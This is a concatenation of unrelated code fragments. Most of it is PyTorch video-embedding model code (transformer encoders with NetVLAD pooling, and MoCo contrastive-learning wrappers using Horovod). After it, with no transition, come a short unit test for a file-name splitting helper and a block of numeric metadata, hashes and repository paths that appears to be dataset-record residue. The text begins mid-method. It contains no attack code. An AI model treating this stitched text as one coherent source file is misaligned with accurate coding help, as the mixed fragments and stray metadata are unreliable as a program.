output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
## NetVLAD Embedding
output_f = output_f.permute(1, 0, 2) # (N, T, C)
output_f = output_f.unsqueeze(2).permute(0, 3, 1, 2)
output_f = self.netvlad_f(output_f, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
## NetVLAD Embedding
output_t = output_t.permute(1, 0, 2) # (N, T, C)
output_t = output_t.unsqueeze(2).permute(0, 3, 1, 2)
output_t = self.netvlad_t(output_t, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = torch.cat((output_f,output_t),1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_NetVLAD_PLUS(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1,netvlad_clusters=16, netvlad_output_dim=1024):
super(CTCA_LATE_NetVLAD_PLUS, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.netvlad_clusters = netvlad_clusters
self.netvlad_output_dim = netvlad_output_dim
self.mlp = None
self.activation = nn.ReLU()
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers, nn.LayerNorm(frame_feature_size))
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers, nn.LayerNorm(temporal_feature_size))
self.netvlad_f = NetVLAD(self.frame_feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
self.netvlad_t = NetVLAD(self.temporal_feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
## NetVLAD Embedding
output_f = output_f.permute(1, 0, 2) # (N, T, C)
output_f = output_f.unsqueeze(2).permute(0, 3, 1, 2)
output_f = self.netvlad_f(output_f, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
## NetVLAD Embedding
output_t = output_t.permute(1, 0, 2) # (N, T, C)
output_t = output_t.unsqueeze(2).permute(0, 3, 1, 2)
output_t = self.netvlad_t(output_t, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = output_f+output_t
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_FC(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE_FC, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.linear_f = nn.Linear(frame_feature_size,512, bias=False)
self.linear_t = nn.Linear(temporal_feature_size,512, bias=False)
self.norm_f = nn.LayerNorm(512)
self.norm_t = nn.LayerNorm(512)
self.mlp = None
self.activation = nn.ReLU()
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers, nn.Sequential(self.linear_f, self.activation, self.norm_f))
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers, nn.Sequential(self.linear_t, self.activation, self.norm_t))
self.reset_parameters()
def reset_parameters(self):
nn.init.normal_(self.linear_f.weight, std=1 / math.sqrt(512))
nn.init.normal_(self.linear_t.weight, std=1 / math.sqrt(512))
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = torch.cat((output_f,output_t),1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_FC_BIAS(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE_FC_BIAS, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.linear_f = nn.Linear(frame_feature_size,512, bias=True)
self.linear_t = nn.Linear(temporal_feature_size,512, bias=True)
self.norm_f = nn.LayerNorm(512)
self.norm_t = nn.LayerNorm(512)
self.mlp = None
self.activation = nn.ReLU()
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers, nn.Sequential(self.linear_f, self.activation, self.norm_f))
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers, nn.Sequential(self.linear_t, self.activation, self.norm_t))
self.reset_parameters()
def reset_parameters(self):
nn.init.normal_(self.linear_f.weight, std=1 / math.sqrt(512))
nn.init.normal_(self.linear_t.weight, std=1 / math.sqrt(512))
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = torch.cat((output_f,output_t),1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_MAX(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE_MAX, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.pool = nn.MaxPool1d(2, stride=2)
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers)
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
# Pooling ( N, output_dim /2)
output_f = torch.unsqueeze(output_f, 1)
output_f = self.pool(output_f)
output_f = torch.squeeze(output_f,1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# Pooling ( N, output_dim /2)
output_t = torch.unsqueeze(output_t, 1)
output_t = self.pool(output_t)
output_t = torch.squeeze(output_t,1)
# breakpoint()
embedding = torch.cat((output_f,output_t),1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_NetVLAD_AUX(nn.Module):
def __init__(self, feature_size=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1, netvlad_clusters=64, netvlad_output_dim=1024):
super(CTCA_NetVLAD_AUX, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.netvlad_clusters = netvlad_clusters
self.netvlad_output_dim = netvlad_output_dim
encoder_layers = nn.TransformerEncoderLayer(
d_model=feature_size,
nhead=nhead,
dim_feedforward=2048,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers,nn.LayerNorm(self.feature_size))
self.netvlad = NetVLAD(self.feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
## NetVLAD Embedding
output = output.unsqueeze(2).permute(0, 3, 1, 2)
output = self.netvlad(output, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
v_embedding = F.normalize(output, p=2, dim=1)
return v_embedding
def encode(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
## Transformer Embedding
# print(output.shape)
t_out = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
t_out = torch.sum(t_out, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
t_embedding = F.normalize(t_out, p=2, dim=1)
## NetVLAD Embedding
output = output.unsqueeze(2).permute(0, 3, 1, 2)
output = self.netvlad(output, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
v_embedding = F.normalize(output, p=2, dim=1)
return t_embedding, v_embedding
class CTCA_NetVLAD(nn.Module):
def __init__(self, feature_size=2048, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1, netvlad_clusters=64, netvlad_output_dim=1024):
super(CTCA_NetVLAD, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.netvlad_clusters = netvlad_clusters
self.netvlad_output_dim = netvlad_output_dim
self.feedforward = feedforward
encoder_layers = nn.TransformerEncoderLayer(
d_model=feature_size,
nhead=nhead,
dim_feedforward=self.feedforward,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers,nn.LayerNorm(self.feature_size))
self.netvlad = NetVLAD(self.feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output.unsqueeze(2).permute(0, 3, 1, 2) # (N, C, T, 1)
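        # The unsqueeze/permute turns the (N, T, C) sequence into a (C, T, 1)
        # "image" per clip so the 2-D NetVLAD head defined earlier in this
        # file can pool over it.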
# breakpoint()
output = self.netvlad(output, mask=frame_mask) # (N, out_dims)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
return embedding
class TCA(nn.Module):
def __init__(self, feature_size=1024, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(TCA, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers = nn.TransformerEncoderLayer(
d_model=feature_size,
nhead=nhead,
dim_feedforward=4096,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
if self.mlp is not None:
embedding = self.mlp(embedding)
# breakpoint()
return embedding
def encode(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = output.permute(1, 0, 2) # (N, T, C)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1) # (N)
output = torch.narrow(output, 1, 0, int(frame_count.item()))
# L2 normalize IMPORTANT!!!
output = F.normalize(output, p=2, dim=2) # (N, T, C)
if self.mlp is not None:
output = self.mlp(output)
return output
class simple_MLP(nn.Module):
def __init__(self, dims):
super(simple_MLP, self).__init__()
self.layers = nn.Sequential(
nn.Linear(dims[0], dims[1]),
nn.ReLU(),
nn.Linear(dims[1], dims[2])
)
def forward(self, x):
        if len(x.shape) == 1:
            x = x.view(1, -1)  # promote a single unbatched vector to (1, dims[0])
x = self.layers(x)
return x
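# simple_MLP serves as a projection head below: MoCo's mlp=True branch swaps
# simple_MLP([1024, 1024, 1024]) onto both encoders, mapping a 1024-d
# embedding through one hidden ReLU layer back to 1024 dims.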
class MoCo(nn.Module):
"""
Build a MoCo model with: a query encoder, a key encoder, and a queue
https://arxiv.org/abs/1911.05722
"""
def __init__(self, base_encoder, dim=1024, K=65536, m=0.999, T=0.07, mlp=False):
"""
dim: feature dimension (default: 1024)
K: queue size; number of negative keys (default: 65536)
m: moco momentum of updating key encoder (default: 0.999)
T: softmax temperature (default: 0.07)
"""
super(MoCo, self).__init__()
self.K = K
self.m = m
self.T = T
# create the encoders
self.encoder_q = base_encoder
self.encoder_k = copy.deepcopy(self.encoder_q)
self.is_mlp = mlp
if self.is_mlp: # hack: brute-force replacement
self.encoder_q.mlp = simple_MLP([1024,1024,1024])
self.encoder_k.mlp = simple_MLP([1024,1024,1024])
for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):
param_k.data.copy_(param_q.data) # initialize
param_k.requires_grad = False # not update by gradient
# create the queue
self.register_buffer("queue", torch.randn(dim, K))
self.queue = F.normalize(self.queue, dim=0)
self.register_buffer("queue_ptr", torch.zeros(1, dtype=torch.long))
@torch.no_grad()
def _momentum_update_key_encoder(self):
"""
Momentum update of the key encoder
"""
for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):
param_k.data = param_k.data * self.m + param_q.data * (1. - self.m)
@torch.no_grad()
def _dequeue_and_enqueue(self, keys):
# gather keys before updating queue
keys = concat_all_gather(keys)
batch_size = keys.shape[0]
ptr = int(self.queue_ptr)
assert self.K % batch_size == 0 # for simplicity
# replace the keys at ptr (dequeue and enqueue)
self.queue[:, ptr:ptr + batch_size] = keys.T
ptr = (ptr + batch_size) % self.K # move pointer
self.queue_ptr[0] = ptr
def forward(self, a, p, n, len_a, len_p, len_n):
"""
Input:
a: a batch of anchor logits
p: a batch of positive logits
n: a bigger batch of negative logits
Output:
logits, targets
"""
if len(n.size()) > 3:
n = n.view(-1, n.size()[2], n.size()[3])
len_n = len_n.view(-1, 1)
# compute query features
q = self.encoder_q(a, len_a) # queries: NxC
q = F.normalize(q, dim=1)
# compute key features
with torch.no_grad(): # no gradient to keys
self._momentum_update_key_encoder() # update the key encoder
            p = self.encoder_k(p, len_p)  # positives: NxC
p = F.normalize(p, dim=1)
k = self.encoder_k(n, len_n) # keys: kNxC
k = F.normalize(k, dim=1)
# compute logits
# Einstein sum is more intuitive
# positive logits: Nx1
l_pos = torch.einsum('nc,nc->n', [q, p]).unsqueeze(-1)
# negative logits: NxK
# breakpoint()
l_neg = torch.einsum('nc,ck->nk', [q, self.queue.clone().detach()])
# print(p.shape,q.shape,self.queue.clone().shape)
# print(l_pos.shape, l_neg.shape)
# logits: Nx(1+K)
logits = torch.cat([l_pos, l_neg], dim=1)
# apply temperature
logits /= self.T
# labels: positive key indicators
labels = torch.zeros(logits.shape[0], dtype=torch.long).cuda()
# dequeue and enqueue
self._dequeue_and_enqueue(k)
return logits, labels
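# Hedged training-step sketch for MoCo (illustrative; the optimizer, batch
# layout, and surrounding Horovod setup are assumptions, not code from this
# file). labels is all zeros because the positive logit always sits in
# column 0 of the (1 + K)-way logits, so InfoNCE reduces to cross-entropy.
def _moco_step_sketch(moco, batch, optimizer):
    a, p, n, len_a, len_p, len_n = batch
    logits, labels = moco(a, p, n, len_a, len_p, len_n)
    loss = F.cross_entropy(logits, labels)  # temperature already applied in forward
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    return loss.item()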
class MoCoAUX(nn.Module):
"""
Build a MoCo model with: a query encoder, a key encoder, and a queue
https://arxiv.org/abs/1911.05722
"""
def __init__(self, base_encoder, t_dim=1024, v_dim=1024, K=65536, m=0.999, T=0.07, mlp=False):
"""
dim: feature dimension (default: 1024)
K: queue size; number of negative keys (default: 65536)
m: moco momentum of updating key encoder (default: 0.999)
T: softmax temperature (default: 0.07)
"""
super(MoCoAUX, self).__init__()
self.K = K
self.m = m
self.T = T
# create the encoders
self.encoder_q = base_encoder
self.encoder_k = copy.deepcopy(self.encoder_q)
self.is_mlp = mlp
if self.is_mlp: # hack: brute-force replacement
pass
for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):
param_k.data.copy_(param_q.data) # initialize
param_k.requires_grad = False # not update by gradient
# create the queue
self.register_buffer("queue_t", torch.randn(t_dim, K))
self.register_buffer("queue_v", torch.randn(v_dim, K))
self.queue_t = F.normalize(self.queue_t, dim=0)
self.queue_v = F.normalize(self.queue_v, dim=0)
self.register_buffer("queue_ptr_t", torch.zeros(1, dtype=torch.long))
self.register_buffer("queue_ptr_v", torch.zeros(1, dtype=torch.long))
@torch.no_grad()
def _momentum_update_key_encoder(self):
"""
Momentum update of the key encoder
"""
for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):
param_k.data = param_k.data * self.m + param_q.data * (1. - self.m)
@torch.no_grad()
def _dequeue_and_enqueue_t(self, keys):
# gather keys before updating queue
keys = concat_all_gather(keys)
batch_size = keys.shape[0]
ptr = int(self.queue_ptr_t)
assert self.K % batch_size == 0 # for simplicity
# replace the keys at ptr (dequeue and enqueue)
self.queue_t[:, ptr:ptr + batch_size] = keys.T
ptr = (ptr + batch_size) % self.K # move pointer
self.queue_ptr_t[0] = ptr
@torch.no_grad()
def _dequeue_and_enqueue_v(self, keys):
# gather keys before updating queue
keys = concat_all_gather(keys)
batch_size = keys.shape[0]
ptr = int(self.queue_ptr_v)
assert self.K % batch_size == 0 # for simplicity
# replace the keys at ptr (dequeue and enqueue)
self.queue_v[:, ptr:ptr + batch_size] = keys.T
ptr = (ptr + batch_size) % self.K # move pointer
self.queue_ptr_v[0] = ptr
def forward(self, a, p, n, len_a, len_p, len_n):
"""
Input:
a: a batch of anchor logits
p: a batch of positive logits
n: a bigger batch of negative logits
Output:
logits, targets
"""
if len(n.size()) > 3:
n = n.view(-1, n.size()[2], n.size()[3])
len_n = len_n.view(-1, 1)
# compute query features
q_t, q_v = self.encoder_q.encode(a, len_a) # queries: NxC
q_t = F.normalize(q_t, dim=1)
q_v = F.normalize(q_v, dim=1)
# compute key features
with torch.no_grad(): # no gradient to keys
self._momentum_update_key_encoder() # update the key encoder
            p_t, p_v = self.encoder_k.encode(p, len_p)  # positives: NxC
p_t = F.normalize(p_t, dim=1)
p_v = F.normalize(p_v, dim=1)
k_t,k_v = self.encoder_k.encode(n, len_n) # keys: kNxC
k_t = F.normalize(k_t, dim=1)
k_v = F.normalize(k_v, dim=1)
# compute logits
# Einstein sum is more intuitive
# positive logits: Nx1
l_pos_t = torch.einsum('nc,nc->n', [q_t, p_t]).unsqueeze(-1)
l_pos_v = torch.einsum('mc,mc->m', [q_v, p_v]).unsqueeze(-1)
# negative logits: NxK
l_neg_t = torch.einsum('nc,ck->nk', [q_t, self.queue_t.clone().detach()])
l_neg_v = torch.einsum('md,dl->ml', [q_v, self.queue_v.clone().detach()])
# print(p.shape,q.shape,self.queue.clone().shape)
# print(l_pos.shape, l_neg.shape)
# logits: Nx(1+K)
logits_t = torch.cat([l_pos_t, l_neg_t], dim=1)
logits_v = torch.cat([l_pos_v, l_neg_v], dim=1)
# apply temperature
logits_t /= self.T
logits_v /= self.T
# labels: positive key indicators
labels = torch.zeros(logits_t.shape[0], dtype=torch.long).cuda()
# dequeue and enqueue
self._dequeue_and_enqueue_t(k_t)
self._dequeue_and_enqueue_v(k_v)
return logits_t, logits_v, labels
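# MoCoAUX calls base_encoder.encode(...) and expects a (t, v) pair of
# embeddings, so it is meant to wrap a dual-headed encoder such as
# CTCA_NetVLAD_AUX above; the two queues keep transformer-pooled and
# NetVLAD embeddings as separate pools of negatives.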
@torch.no_grad()
def concat_all_gather(tensor):
"""
Performs all_gather operation on the provided tensors.
*** Warning ***: torch.distributed.all_gather has no gradient.
"""
return hvd.allgather(tensor.contiguous())
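# Assumed setup (not shown in this file): hvd refers to horovod.torch and
# must be initialized with hvd.init() before allgather can be called.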
from prunner.util.convert import split_file_component
def test_split_file_component():
assert split_file_component("Just content") == ("Just content", None)
assert split_file_component("Filename#Content") == ("Content", "Filename")
| 34.571429
| 78
| 0.760331
| 30
| 242
| 5.833333
| 0.5
| 0.205714
| 0.411429
| 0.274286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115702
| 242
| 6
| 79
| 40.333333
| 0.817757
| 0
| 0
| 0
| 0
| 0
| 0.227273
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ff307a7c8fd4f66c1b2f077e44028ad36e90232
| 4,309
|
py
|
Python
|
OpenGLCffi/GL/EXT/ARB/gpu_shader_int64.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
OpenGLCffi/GL/EXT/ARB/gpu_shader_int64.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
